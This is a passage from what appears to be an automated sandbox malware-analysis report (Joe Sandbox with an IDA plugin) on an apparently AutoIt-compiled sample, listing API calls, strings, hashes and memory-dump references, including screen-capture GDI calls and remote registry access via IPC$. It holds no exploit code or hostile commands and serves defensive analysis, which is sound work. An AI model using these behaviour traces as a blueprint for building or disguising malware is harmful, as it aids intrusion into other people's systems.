                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: 51b3ed68e7db5324fba3e0717ef9bfd8ea6b890f5fb85fc63a6c530c4fa1c75f
                                                  • Instruction ID: efd846b2eddd558f722db4c9e8bb21b05075bdab22d8f3945255fa24911ba2ea
                                                  • Opcode Fuzzy Hash: 51b3ed68e7db5324fba3e0717ef9bfd8ea6b890f5fb85fc63a6c530c4fa1c75f
                                                  • Instruction Fuzzy Hash: D9817D706083029FD710DF15C8D4BBABBE8FB88714F00892EF9A9972A1D770D945DB62
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C6738F
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00C6739B
                                                  • CreateCompatibleDC.GDI32(?), ref: 00C673A7
                                                  • SelectObject.GDI32(00000000,?), ref: 00C673B4
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00C67408
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00C67444
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00C67468
                                                  • SelectObject.GDI32(00000006,?), ref: 00C67470
                                                  • DeleteObject.GDI32(?), ref: 00C67479
                                                  • DeleteDC.GDI32(00000006), ref: 00C67480
                                                  • ReleaseDC.USER32(00000000,?), ref: 00C6748B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 749eb7381b9284ffee5326a72cd99d083c7640e333fd127e9985feff6fb8ce60
                                                  • Instruction ID: 0183ae7a1fc68c0f68861dd391f8d1b074fb6b9c1fc8ee5aa76eae9bea506184
                                                  • Opcode Fuzzy Hash: 749eb7381b9284ffee5326a72cd99d083c7640e333fd127e9985feff6fb8ce60
                                                  • Instruction Fuzzy Hash: 40513875904209EFCB24CFA9CC84FAEBBB9EF48310F14852DF95997320C771A9419B50
                                                  APIs
                                                    • Part of subcall function 00C10957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00BF6B0C,?,00008000), ref: 00C10973
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BF6BAD
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF6CFA
                                                    • Part of subcall function 00BF586D: _wcscpy.LIBCMT ref: 00BF58A5
                                                    • Part of subcall function 00C1363D: _iswctype.LIBCMT ref: 00C13645
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                  • API String ID: 537147316-1018226102
                                                  • Opcode ID: 653d5c28297eb7bd97c886a30dafa6cbb2aea4166d5e459395c3d532adc58cb6
                                                  • Instruction ID: c9cfe08d16f3d24b22c2daf28da9555a39103054d9a07e0518cd8bec8bc61d4d
                                                  • Opcode Fuzzy Hash: 653d5c28297eb7bd97c886a30dafa6cbb2aea4166d5e459395c3d532adc58cb6
                                                  • Instruction Fuzzy Hash: 5C02CE301083449FC724EF24D8819AFBBE5FF99314F10496DFA99972A1DB30DA89DB52
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52D50
                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00C52DDD
                                                  • GetMenuItemCount.USER32(00CB5890), ref: 00C52E66
                                                  • DeleteMenu.USER32(00CB5890,00000005,00000000,000000F5,?,?), ref: 00C52EF6
                                                  • DeleteMenu.USER32(00CB5890,00000004,00000000), ref: 00C52EFE
                                                  • DeleteMenu.USER32(00CB5890,00000006,00000000), ref: 00C52F06
                                                  • DeleteMenu.USER32(00CB5890,00000003,00000000), ref: 00C52F0E
                                                  • GetMenuItemCount.USER32(00CB5890), ref: 00C52F16
                                                  • SetMenuItemInfoW.USER32(00CB5890,00000004,00000000,00000030), ref: 00C52F4C
                                                  • GetCursorPos.USER32(?), ref: 00C52F56
                                                  • SetForegroundWindow.USER32(00000000), ref: 00C52F5F
                                                  • TrackPopupMenuEx.USER32(00CB5890,00000000,?,00000000,00000000,00000000), ref: 00C52F72
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C52F7E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                  • String ID:
                                                  • API String ID: 3993528054-0
                                                  • Opcode ID: 7b80723b2f4953723e183ea30e41386029fe03bc5cfc2739d491ef432e1e5043
                                                  • Instruction ID: b402df191d1636ce4feab83d17099e9fa39b5c3008178aac4001fba68e3b8f3d
                                                  • Opcode Fuzzy Hash: 7b80723b2f4953723e183ea30e41386029fe03bc5cfc2739d491ef432e1e5043
                                                  • Instruction Fuzzy Hash: 3B712834600215BFEB218F54DC86FAABFA4FF06326F100216FA29A61E1C7B15D98D758
                                                  APIs
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  • _memset.LIBCMT ref: 00C4786B
                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C478A0
                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C478BC
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C478D8
                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C47902
                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C4792A
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C47935
                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C4793A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                  • API String ID: 1411258926-22481851
                                                  • Opcode ID: 8a9b091fce5994904a2e08a71078f1b85acc1358511c80283951b54c76ee0b96
                                                  • Instruction ID: 11c9cfe9ee1cb604f3e489e6790d88c8e29760c8657e295f0e887223fc255b15
                                                  • Opcode Fuzzy Hash: 8a9b091fce5994904a2e08a71078f1b85acc1358511c80283951b54c76ee0b96
                                                  • Instruction Fuzzy Hash: 33411972C1462DABCB11EBA4DC95DFDB7B8FF18310F4441A9E915A31A1DB305E09CB90
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: 5c420216ccff7cffea4016e60308c6afbc8ce5b937cdfd2017ca50f552730320
                                                  • Instruction ID: a40aacf4f7431373062f9c041379ab8f8d884f0baf806c56c301080dc33f1f79
                                                  • Opcode Fuzzy Hash: 5c420216ccff7cffea4016e60308c6afbc8ce5b937cdfd2017ca50f552730320
                                                  • Instruction Fuzzy Hash: DD418D7111024ACBCF20EF60D856AEF3764FF16304F648455FC691B292DB709E9AEBA0
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00C2E2A0,00000010,?,Bad directive syntax error,00C7F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00C4F7C2
                                                  • LoadStringW.USER32(00000000,?,00C2E2A0,00000010), ref: 00C4F7C9
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                  • _wprintf.LIBCMT ref: 00C4F7FC
                                                  • __swprintf.LIBCMT ref: 00C4F81E
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00C4F88D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 1506413516-4153970271
                                                  • Opcode ID: 39f021e7afba0046e2a64ebe2f1d20b8eb904b93091def6e9236b1cc5450c23c
                                                  • Instruction ID: a005d986bda980784ca0ba209959ae6999a335fd8121da18d5e1ee1d19f4dacc
                                                  • Opcode Fuzzy Hash: 39f021e7afba0046e2a64ebe2f1d20b8eb904b93091def6e9236b1cc5450c23c
                                                  • Instruction Fuzzy Hash: BA218C3284021EEBCF11AF90CC5AEFE7778FF19304F0404A9F615660A2EA719658DB50
                                                  APIs
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                    • Part of subcall function 00BF7924: _memmove.LIBCMT ref: 00BF79AD
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00C55330
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00C55346
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C55357
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00C55369
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00C5537A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: SendString$_memmove
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 2279737902-1007645807
                                                  • Opcode ID: 70710976af2a558c3713c13e8a69416a1fe7aaa68d1b7f3c40fcab54aa371bc8
                                                  • Instruction ID: 047f3ba5c3305bd05d0771343271f85e750f3ec71fc0419ce2c52890a092cfb0
                                                  • Opcode Fuzzy Hash: 70710976af2a558c3713c13e8a69416a1fe7aaa68d1b7f3c40fcab54aa371bc8
                                                  • Instruction Fuzzy Hash: 0B11862199052E7AD724B765CC5ADFFBBBCEB96B44F0004A9B915930E1EDA00E4DC5B0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 208665112-3771769585
                                                  • Opcode ID: de5638b05e860cdf6e008de6bbcd0c3467c9a5947d269f56e17d9198ed820169
                                                  • Instruction ID: d478aa6b0b016469473d0310f26a319ac224d1d99c447509dacde5712cdd435d
                                                  • Opcode Fuzzy Hash: de5638b05e860cdf6e008de6bbcd0c3467c9a5947d269f56e17d9198ed820169
                                                  • Instruction Fuzzy Hash: 3D11F335500104ABCB18AB30AC86FDE77BCEF07356F0401BAF84992091EF708AC6EA55
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00C54F7A
                                                    • Part of subcall function 00C1049F: timeGetTime.WINMM(?,75A4B400,00C00E7B), ref: 00C104A3
                                                  • Sleep.KERNEL32(0000000A), ref: 00C54FA6
                                                  • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00C54FCA
                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00C54FEC
                                                  • SetActiveWindow.USER32 ref: 00C5500B
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00C55019
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00C55038
                                                  • Sleep.KERNEL32(000000FA), ref: 00C55043
                                                  • IsWindow.USER32 ref: 00C5504F
                                                  • EndDialog.USER32(00000000), ref: 00C55060
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 298f0b4a4a53702f1837f989bc269aa9acd058fff81ecece3a041fa3ae9eb88c
                                                  • Instruction ID: fd2716fa438fc417cde19e846e1f4c63223584e9fdea50da9dd37f4ef8fc6be4
                                                  • Opcode Fuzzy Hash: 298f0b4a4a53702f1837f989bc269aa9acd058fff81ecece3a041fa3ae9eb88c
                                                  • Instruction Fuzzy Hash: D921D179644605AFE7205F70ECC8B2E3B69FB4874AF041128F809811F0CB719ED99776
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CoInitialize.OLE32(00000000), ref: 00C5D5EA
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C5D67D
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00C5D691
                                                  • CoCreateInstance.OLE32(00C82D7C,00000000,00000001,00CA8C1C,?), ref: 00C5D6DD
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C5D74C
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00C5D7A4
                                                  • _memset.LIBCMT ref: 00C5D7E1
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00C5D81D
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C5D840
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00C5D847
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00C5D87E
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00C5D880
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: f80efdbf0920d62c8e6bf84a0a766bc19fedc428896691b31879b11bee0d70c5
                                                  • Instruction ID: 05ef8b08ad1a241fef37e1c48f24ee19821ea50d95965f282355e396f0bbe51f
                                                  • Opcode Fuzzy Hash: f80efdbf0920d62c8e6bf84a0a766bc19fedc428896691b31879b11bee0d70c5
                                                  • Instruction Fuzzy Hash: 94B10F75A00209AFDB14DF64C888EAEBBF9FF49305B1444A9F90ADB251DB30ED85CB54
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00C4C283
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C295
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C4C2F3
                                                  • GetDlgItem.USER32(?,00000002), ref: 00C4C2FE
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C310
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C4C364
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C4C372
                                                  • GetWindowRect.USER32(00000000,?), ref: 00C4C383
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C4C3C6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00C4C3D4
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C4C3F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4C3FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: 9c6708e14c5428c950820a2c1eb1d049323c08a356d62e133d59aa17557c7445
                                                  • Instruction ID: 051424455d5fa56b34000b6db075594dfdea971e66ebe6088bf71e8000679e4f
                                                  • Opcode Fuzzy Hash: 9c6708e14c5428c950820a2c1eb1d049323c08a356d62e133d59aa17557c7445
                                                  • Instruction Fuzzy Hash: 4E510F71B00205ABDB18CFA9DD99BAEBBB6FB88711F14812DF519D72A0D7709E418B10
                                                  APIs
                                                    • Part of subcall function 00BF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2036,?,00000000,?,?,?,?,00BF16CB,00000000,?), ref: 00BF1B9A
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BF20D3
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00BF216E
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00C2BCA6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BCD7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BCEE
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF16CB,00000000,?,?,00BF1AE2,?,?), ref: 00C2BD0A
                                                  • DeleteObject.GDI32(00000000), ref: 00C2BD1C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 6fc29577b193f632c89e6e73441e66ab3cbaf38333f2531a62c32bad3156a952
                                                  • Instruction ID: 46c1ff85a73fee1bedde73150f830baaffd434e9429cadc58022b991cb0bc309
                                                  • Opcode Fuzzy Hash: 6fc29577b193f632c89e6e73441e66ab3cbaf38333f2531a62c32bad3156a952
                                                  • Instruction Fuzzy Hash: D1619931100A18DFDB25AF24D989B3AB7F2FF44312F10856DE2469BAA0CB71AD85DF40
                                                  APIs
                                                    • Part of subcall function 00BF25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BF25EC
                                                  • GetSysColor.USER32(0000000F), ref: 00BF21D3
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: 5a5a67003089fba937e2b32d15791f433c86d76a1a67ae2c23221e6e120dfc17
                                                  • Instruction ID: e7e0681e24b27f4605220d274831ce338ef5b6d173ad1ccf39060c5c7fa66223
                                                  • Opcode Fuzzy Hash: 5a5a67003089fba937e2b32d15791f433c86d76a1a67ae2c23221e6e120dfc17
                                                  • Instruction Fuzzy Hash: 5841B231100154DFDB215F28EC88BBD3BA5EB06331F6442A9FE658B1E6C7318D86DB21
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,00C7F910), ref: 00C5A90B
                                                  • GetDriveTypeW.KERNEL32(00000061,00CA89A0,00000061), ref: 00C5A9D5
                                                  • _wcscpy.LIBCMT ref: 00C5A9FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
